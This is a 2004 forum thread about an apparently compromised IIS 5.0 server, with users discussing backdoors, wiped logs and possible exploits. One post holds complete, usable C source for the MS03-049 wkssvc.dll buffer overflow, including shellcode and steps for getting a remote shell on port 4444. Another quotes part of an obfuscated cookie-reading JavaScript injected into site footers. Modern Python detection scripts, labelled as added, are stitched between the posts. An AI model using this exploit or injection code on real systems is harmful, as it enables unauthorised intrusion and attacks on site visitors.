T3cHn0b0y
Jun 22 2004, 03:55 PM
Hi guys...I thought I'd let you know that this morning I woke up to a logon screen with a nice little error message from inetinfo.exe stating that the program had tried to execute at a memory reference inaccessible by the program. From earlier research into network security and particularly the buffer overflow, I realised that it was possible that my system had been compromised.
After logging in I decided to check the application event logs to get a more detailed description of what had happened... there were none, so I proceeded to check for newly made user accounts... there was one. Similar to a typical characteristic of an administrative user added from a command prompt, this user belonged to the user groups "Users" and "Administrators". I disabled this user and decided to start looking for trojans or other backdoor server software. Using fport, I was able to identify a program named svchost.exe running in the folder "C:\WINNT\System32\dllcache" on port 6135 (TYPICAL!). Connecting to this port left me with a plain 220 error code. Realising this was probably either an HTTP server or an FTP server, I tried issuing a USER command and received "331 User name okay, need password".
I then removed all registry entries referencing this program, restarted the box, and deleted, what I presume to be, "Serv-U" FTP Server.
So, by now, I was convinced that my box had been taken over by hackers and decided to see if I could identify how the hackers exploited the IIS 5.0 server (inetinfo.exe) by examining the W3 service logs... there were none. I then remembered back to a time when a partition table became corrupt on an old hard disk drive of mine and I was able to recover the logfiles with an advanced file recovery program... but from looking at the previous weeks' logfiles for the website running on my system, I can't identify anything unusual about any of the log entries made, except for some attempts to execute cmd.exe via unicode (blocked) and some 404 messages for requests to scripts that do not exist on my website.
I am not running any 3rd party server software from my system, all patches have been applied from windowsupdate and all packets to unnecessary open ports are filtered out by my router. I'm led to believe that there is a new IIS exploit of some sort circulating in the wild and would like to know more if anyone has any information or has had any similar experiences.
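The log review described above can be scripted. This is an added example, not code from the thread: it parses an IIS 5.0 W3C extended log (the `#Fields:` header names the columns) and flags the request patterns the post mentions, unicode/double-encoded traversal to cmd.exe, `.htr` probes and ISAPI/FrontPage probes, with per-source counts. The log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed IIS 5.0 W3C extended log, not a real capture from the thread.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-06-20 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-06-20 11:58:02 192.0.2.10 GET /index.htm - 200
2004-06-20 12:03:41 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2004-06-20 12:03:44 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404
2004-06-20 12:04:10 198.51.100.7 GET /iisadmpwd/aexp.htr - 404
2004-06-20 12:06:55 198.51.100.7 HEAD /_vti_bin/shtml.dll - 404
2004-06-20 12:07:02 198.51.100.7 GET /default.htm - 200
"""

# Request patterns the thread mentions (cmd.exe via unicode, .htr, ISAPI probes).
SUSPICIOUS = [
    ("cmd.exe traversal", re.compile(r"cmd\.exe|/winnt/system32/", re.I)),
    (".htr probe", re.compile(r"\.htr$", re.I)),
    ("ISAPI/FrontPage probe", re.compile(r"/_vti_bin/|\.(dll|ida|idq|printer)$", re.I)),
]

def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def triage(text):
    """Return (hits, per_ip): hits are (time, ip, label, decoded stem, status)."""
    hits, per_ip = [], {}
    for r in parse_w3c(text):
        # Decode twice so %255c (double-encoded backslash) is seen as a traversal.
        stem = unquote(unquote(r["cs-uri-stem"]))
        for label, rx in SUSPICIOUS:
            if rx.search(stem):
                hits.append((r["time"], r["c-ip"], label, stem, r["sc-status"]))
                per_ip[r["c-ip"]] = per_ip.get(r["c-ip"], 0) + 1
                break
    return hits, per_ip

if __name__ == "__main__":
    hits, per_ip = triage(SAMPLE_LOG)
    for h in hits:
        print(" ".join(h))
    print("requests per source:", per_ip)
```

Blocked 404s from one source clustered in time are the pattern worth keeping; a 200 on the same stem later is what would indicate the attempt succeeded.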
Zekk
Jun 22 2004, 04:39 PM
you sure you are patched? does not sound like it.
T3cHn0b0y
Jun 22 2004, 04:42 PM
| QUOTE (Zekk @ Jun 22 2004, 04:39 PM) | | you sure you are patched? does not sound like it. |
It's patched believe me! I've tested the WebDAV root exploit against the box, scanned it with a unicode scanner and used some security scanning software (GFI LANGuard).
touk
Jun 22 2004, 04:48 PM
did u try .htr and ssl too?
T3cHn0b0y
Jun 22 2004, 04:55 PM
| QUOTE (touk @ Jun 22 2004, 04:48 PM) | | did u try .htr and ssl too ? |
.htr is tested by GFI and SSL isn't even accessible from outside the network. The box in question has served 3 websites for more than 18 months now without it ever being subject to a successful attack by a hacker.
usch
Jun 22 2004, 05:12 PM
yeah i heard something about a new exploit, but only a very little bit. someone on irc said:
<1>: anyone knows the new iis 6.0 exploit? friend of mine told me
<2>: nope, never heard of it. could it be that your friend is into the security scene?
<1>: yes indeed
^^ seems strange, let's wait and see what comes
egeezer
Jun 22 2004, 05:26 PM
Just guessing, of course, but if there are other systems in a trusted part of your network, have they been checked for problems?
If you didn't find any way to get in from outside, check whatever might be considered as trusted inside or through dialup, VPN access, RADIUS etc. (Don't forget the laptops that come and go)
I found one situation where a client system inside a trusted network had become compromised by a sneakernet install of a "media player" and used TFTP to upload malware to the server. From there, the back door was opened.
HTH
o0oKARo0o
Jun 22 2004, 05:45 PM
I know this shouldn't be here but I can't start a thread so move it to a new thread if needed... Here is an interesting exploit... (wkksvc.dll buffer overflow exploit)
| CODE |
#include <windows.h>
#include <winbase.h>
#include <lm.h>
#include "LMJoin.h" //prolly don't need this but what the hey.
#include <winnls.h>
#include <stdio.h>
#include <string.h>

typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL, IN LPCWSTR AlternateName,
                       IN LPCWSTR DomainAccount OPTIONAL,
                       IN LPCWSTR DomainAccountPassword OPTIONAL, IN ULONG Reserved);

int main(int argc, char **argv)
{
    char overwrite[2045] = "";
    char sc[] =
        "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
        "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
        "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
        "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
        "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
        "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
        "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
        "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
        "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
        "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
        "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
        "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
        "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
        "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
        "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
        "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
        "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
        "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
        "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
        "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
        "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
        "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
        "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
        "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
        "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
        "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
        "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
        "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
        "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
        "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
        "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
        "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
    char exp_buf[2045+4+16+501];
    char ip[30];
    LPWSTR ipl[60];
    DWORD jmpesp = 0x7518A747;
    LPWSTR unicode[(2045+4+16+501)*2];
    int i = 0;
    int len = 0;
    HINSTANCE hinstLib;
    MYPROC ProcAddr;
    BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

    if (argc < 2) {
        fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n");
        fprintf(stderr, "Usage: %s <ip>\n", argv[0]);
        fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\""
                        "\nC:\\>0349 ip.ip.ip.ip\n"
                        "open new cmd:\n"
                        "C:\\>nc ip.ip.ip.ip 4444\n"
                        "If it doesn't hang the ip's invalid or it did not work\n");
        exit(1);
    }

    printf("Attacking: %s\n", argv[1]);
    _snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:)
    hinstLib = LoadLibrary("netapi32.dll");

    memset(overwrite, 0x41, 2000);
    memset(overwrite+2000, 0x90, 44);
    memcpy(exp_buf, overwrite, 2044);
    memcpy(exp_buf+2044, &jmpesp, 4);
    memset(exp_buf+2048, 0x90, 16);
    memcpy(exp_buf+2064, sc, sizeof(sc));

    MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
    wprintf(L"\n%s", ipl);
    len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf),
                              (unsigned short *)unicode, sizeof(unicode));

    if (hinstLib != NULL) {
        ProcAddr = (MYPROC) GetProcAddress(hinstLib, "NetAddAlternateComputerName");
        if (NULL != ProcAddr) {
            fRunTimeLinkSuccess = TRUE;
            printf("\nGetProcAddr: %x\n", *ProcAddr);
            printf("Sending exploit, you should be able to nc to the host\n");
            (ProcAddr)((LPCWSTR)ipl, (const unsigned short *)unicode, NULL, NULL, 0);
        } else {
            printf("procaddr null\n");
        }
        fFreeResult = FreeLibrary(hinstLib);
    } else {
        printf("hinst null\n");
    }
    return(0);
}
|
usch
Jun 22 2004, 05:49 PM
"ms03-049" old one oO
regards usch
isaiah
Jun 22 2004, 07:46 PM
a possible way is that maybe someone hacked a computer on your lan and did a lan hack...
brOmstar
Jun 22 2004, 07:57 PM
Can u give us the entry from the eventlog??
T3cHn0b0y
Jun 22 2004, 08:11 PM
| QUOTE (isaiah @ Jun 22 2004, 07:46 PM) | | a positble way is that maybe some hackeed a computer on your lan and did a lan hack... |
I thought of this already but even if they did compromise another computer on the network, they wouldn't be able to access this one from inside because:
1) There is no domain controller,
2) All shares are disabled including $Admin and $IPC,
3) Local IP Security Policies only allow connections to ports 21, 53 and 80,
4) I only use strong passwords for user accounts.
I'm pretty sure this was an outside job.
T3cHn0b0y
Jun 22 2004, 08:17 PM
| QUOTE (brOmstar @ Jun 22 2004, 07:57 PM) | | Can u give us the entry from the eventlog?? |
The event logs had been wiped clean but the message I received at the logon screen contained two memory references. I only wish I had written them down, but they were something like 0x1axxxxxx and 0x19xxxxxx.
I'm led to believe that this error could have occurred as a result of trying to execute code in memory that it is not allowed to access. Maybe an incorrect offset could have been used in an attempt to execute shellcode entered into a buffer somewhere?
Yorn
Jun 22 2004, 10:40 PM
Have a copy of the logs you could send me?
andydis
Jun 22 2004, 11:52 PM
T3cHn0b0y u running sql?
just a thought, very interesting post tho
ideas;
i) turn your box into a honeypot trap for when they come back on the specified port :-)
ii) install SNORT, keep your server exactly as is (with the exploit removed) and see if they come back for another go :-)
Killaloop
Jun 22 2004, 11:54 PM
something doesn't look right here technoboy. someone using an unpublished IIS exploit for sure doesn't drop an easily trackable servu in the dllcache folder, nor would he use clean.exe to delete all your log files, nor would he let the error message sit on your screen, and he wouldn't create a new administrator account on your machine. all this looks more like the job of a scriptkid/fxpler, and that would be the first time these people code their own exploits for software that 10000 others try to find bugs in. recheck everything again!! did you look at the date of the servu executable? maybe they hacked you a while ago with a common exploit and misused your PC in a way that your IIS server crashed. that's not the job of someone who knows what he is doing
B3T4
Jun 23 2004, 10:51 AM
my thoughts exactly killaloop.
it could also have been done with a local exploit perhaps, or an email trojan/worm
w0bbes
Jun 23 2004, 11:03 AM
I don't know if I'm any help, but I might have some information.
I had the same problem with my WinXP box: when Windows started it displayed an error that inetinfo.exe was missing. My idea was that hackers planted a system service on my PC and I deleted it, but it is still looking for the file. I have got lsass running though, and I think I got hacked on that; I'm on range 85.*.*.* which gets scanned a lot by botnets...
I'm behind a router too, so that makes two of us :D
The svchost.exe is probably an exploit scanner, like a renamed scan500.exe.
T3cHn0b0y
Jun 23 2004, 06:58 PM
Killaloop, thanks for the reply. The suggestion to check the date of the svchost.exe executable was good, but after deleting it and restoring it the timestamp was modified to today's date. However, I did manage to sort all files found on my computer by the date last modified and came across a text file containing a script to download svchost.exe from an ftp server. The last modified timestamp of this file is dated 20/06/2004 12:07.
I decided to visit the windows update website to check the dates of when all my patches were applied, the most recent being the 10th of June 2004 (Direct X 9.0 Update). I think this proves that the system was fully patched and has been compromised by exploiting a vulnerability unknown to the public.
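The last-modified sweep that turned up the downloader script can be automated. This is an added example, not code from the thread: it walks a tree for small, recently modified text files whose lines read like an `ftp -s:` script (`open <host>`, `user`, `get`, `bye`/`quit`) and reports the host each one fetches from. The sample tree, file names and hosts are constructed.

```python
import os
import re
import tempfile
import time

# ftp.exe script verbs at line start: open <host>, user <u> <p>, bin, get <file>, bye/quit.
VERB = re.compile(r"^\s*(open|user|get|mget|binary|bin|quit|bye)\b", re.I | re.M)

def looks_like_ftp_script(text):
    """A scripted download needs an `open`, a `get`, and a credential or exit verb."""
    verbs = {m.group(1).lower() for m in VERB.finditer(text)}
    return "open" in verbs and bool(verbs & {"get", "mget"}) and bool(verbs & {"user", "quit", "bye"})

def recent_ftp_scripts(root, max_age_days=3, max_bytes=4096):
    """Return sorted [(mtime, path, host)] for small text files modified recently."""
    since = time.time() - max_age_days * 86400
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            if st.st_size > max_bytes or st.st_mtime < since:
                continue  # binaries and old files are out of scope for this pass
            try:
                with open(path, encoding="ascii") as f:
                    text = f.read()
            except (UnicodeDecodeError, OSError):
                continue
            if looks_like_ftp_script(text):
                m = re.search(r"^\s*open\s+(\S+)", text, re.I | re.M)
                hits.append((st.st_mtime, path, m.group(1) if m else None))
    return sorted(hits)

def build_sample_tree():
    """Constructed tree: a fresh dropper script, a benign note, and a week-old script."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "WINNT", "System32"))
    dropper = os.path.join(root, "WINNT", "System32", "x.txt")
    with open(dropper, "w") as f:
        f.write("open ftp.example.invalid\nuser anonymous pass\nbin\nget svchost.exe\nbye\n")
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("open the report and get it signed, then quit for the day\n")
    old = os.path.join(root, "old.txt")
    with open(old, "w") as f:
        f.write("open mirror.example.invalid\nuser ftp ftp\nget readme.txt\nquit\n")
    os.utime(old, (time.time() - 7 * 86400,) * 2)  # backdate so it falls outside the window
    return root, dropper
```

Run it against a copied image rather than the live disk where possible: opening files on the live system updates access times and can disturb the very timeline being built.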
slynx
Jun 23 2004, 08:00 PM
it wouldn't surprise me in the least if there was a new and unpublished iis 5/6 hole, and it's not uncommon for script kiddies to get their hands on these kinds of things (remember kevin mitnick?). if you can recover any of the deleted logfiles, or if there's anything at all unusual that shows up in any of the logs you still have, please post them here for review.
also, setting up a honeypot is a really good idea.... if it is an unpublished exploit and they do come around for another go, you just learned something you're not supposed to know ;p
also, what ftp server was set in the script?
Gurou
Jun 24 2004, 06:50 PM
can you recover your log files ?
as0l0
Jun 25 2004, 01:23 AM
there is a suggestion of a possible 0day @ http://isc.sans.org/
Spookie
Jun 29 2004, 11:51 AM
Once IIS servers are compromised, an .exe is run on the server. This configures the IIS server to create malicious web pages that have hostile JavaScript code in the footer of every web page created by the server.
So far it looks like it uses 2 vulnerabilities in conjunction with one another and does affect patched boxes as well on the client side when viewing infected sites/hosts.
Excerpt from the code; you can view the javascript in its entirety on the enclosed links
| QUOTE | | var qxco7=document.cookie;function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function okx12(){window.status="";setTimeout("okx12()", 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script language=\"JavaScript\" src=\ |
This has been in effect now for around 9-10 days.
IIS 0 Day Hack Info
Additional reading material
More on IIS Hack
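A site owner can check their own served pages for the footer Spookie describes. This is an added example, not code from the thread: it looks at the last `<script>` block of a page for the indicators visible in the excerpt (the `window.status`/`setTimeout` loop, the `document.cookie` gate, the `https` check, and a `document.write()` of an external `<script src=...>`) and extracts the remote script URL. The two HTML pages are constructed, and the script host is a placeholder, not the real one.

```python
import re

# Indicators drawn from the excerpt above: status-bar hiding loop, cookie gate,
# https check and a document.write() of an external <script src=...>.
INDICATORS = {
    "status_bar_hiding": re.compile(r'window\.status\s*=\s*""\s*;\s*setTimeout\('),
    "cookie_gate": re.compile(r'document\.cookie'),
    "https_gate": re.compile(r'location\.href\.indexOf\("https"\)\s*!=\s*0'),
    "remote_script_write": re.compile(
        r'document\.write\("<script[^>]*?src=\\"(https?://[^\\"]+)\\"', re.I),
}

def scan_page(html):
    """Inspect the last <script> block of a page (where the footer injection lands)
    and return {indicator: True-or-captured-src} for every indicator found."""
    scripts = re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I)
    if not scripts:
        return {}
    found = {}
    for name, rx in INDICATORS.items():
        m = rx.search(scripts[-1])
        if m:
            found[name] = m.group(1) if m.groups() else True
    return found

def is_injected(html, min_indicators=3):
    """Treat a page as injected when most of the indicators co-occur in its footer."""
    return len(scan_page(html)) >= min_indicators

# Constructed pages; the script src host is a placeholder, not the real one.
CLEAN_PAGE = '<html><body><p>Hello</p><script>document.getElementById("x");</script></body></html>'
INJECTED_PAGE = '''<html><body><p>Welcome</p>
<script>var qxco7=document.cookie;function gc099(n21){var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;return "1";}function okx12(){window.status="";setTimeout("okx12()", 200);}
okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){
document.write("<script language=\\"JavaScript\\" src=\\"http://injected.example/x.js\\"><\\/script>");}}
</script></body></html>'''

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, is_injected(page), scan_page(page))
```

Because the footer is appended by the server to every response, one injected page usually means the whole site is, so the captured src host is the thing to block at the proxy and to search the rest of the server for.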
DougieShiney
Jul 1 2004, 10:06 AM
it appears that there must be a new exploit for IIS server, but what it is, ??? no idea, but it is also adding and using the IE exploit, which as far as i know M$ aren't patching.. as i think they don't yet know how to patch it or they would have.
Thing is, if you think about it, if you use say the IIS SSL exploit and amend the server so that everyone who visits gets infected with a rootkit etc, or some virus that then reports back to a server and automates the download etc of a proxy / ftp etc and then logs that somewhere else, you would infect hundreds of folk... as there are plenty of IIS exploits, it's also possible that the people infected may have an IIS server that is patched, and then it goes on, so the question is: is this some sort of automated worm or is it a new exploit...
jubbly
Jul 1 2004, 01:37 PM
I would take the advice of installing Snort and waiting for another attack and see if the logs on that help. Especially as snort logs won't be looked for.
jimmy
Jul 1 2004, 04:27 PM